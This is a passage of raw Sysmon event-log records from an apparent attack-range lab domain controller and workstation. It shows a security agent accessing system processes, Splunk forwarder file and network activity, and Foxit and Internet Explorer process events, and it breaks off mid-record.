12:29:51.870{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046430Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:51.865{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046429Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:51.860{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046428Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:51.858{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046427Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:51.857{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046426Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:51.855{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046425Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:51.834{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046424Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:51.830{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046423Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:51.826{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046422Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:51.815{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046421Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:51.810{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046420Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:51.796{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046419Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:51.796{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046418Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:51.787{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046417Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:51.782{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046416Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:51.765{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046415Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:51.758{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046414Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:51.728{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046413Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:51.726{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 23542300x800000000000000046412Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:51.058{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E0E3D95AE8B76DD728EAC2EFC70E301,SHA256=9D76C26B85C3CA71C0303693049FAE133B73B1D2AA5C1B8B9183A5213925E4FD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018665Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:52.729{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22A48E70CFC01A711D4973F51B583AF8,SHA256=9219C0526784E29F70BBBF21D2764430E50E9B58FB3B247EBD1750E3B9F0388A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000046443Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:50.505{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56468-false10.0.1.12-8000- 23542300x800000000000000046442Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:52.685{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\ProgramData\Foxit Software\Foxit PDF Reader\FoxitSensor\Sensor.db-journalMD5=3112B2728B5E1F16D12EC1092A78465E,SHA256=B940D194D2846B688BFA409CFC1BB1A3FF809F8AE2A11AEC95A3BFF26B06D7B8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000046441Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:52.605{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=2C8BBDDF34F8DB3135AF01B0EDBBFB67,SHA256=D7663487FE23DD1CE01D25D139F193F0A75C4795DCB573471F4E5A7299CBB7C5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000046440Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:52.559{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8aac0|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046439Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:52.559{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+12ccb9|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046438Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:52.174{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 23542300x800000000000000046437Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:52.101{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8886BD1257FAB965A31BD436058B30EE,SHA256=E2BCDA0A04EA5C75731A32589FA7F88448115BA3517A1AFA4BD63369854F60C4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000018664Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:50.947{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50188-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000018666Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:53.795{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA3F62078DF6F76A40A4F98E184BF872,SHA256=A0C2DA91C167FF3BE3CC584015E469F8495F4A43528AB346737EA7285D4858F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046444Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:53.191{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB8E141B9E39A42CFB694856BAA51FE2,SHA256=D9FD1E5BDCC9B32066CF3389F4FF3728115A11658016BF0F21FCB9852F0EC138,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018667Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:54.859{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB2D2DEC8F6E8F1CDB1EDD09A37A7E4D,SHA256=7E821A4DDE03ED9AD15681647AC1A6A9D15DA9E9C0C653B427FA51581171E20A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000046470Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:54.791{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E606-63C7-7F06-00000000AF02}7140C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046469Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:54.784{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046468Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:54.780{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000046467Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:54.779{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF 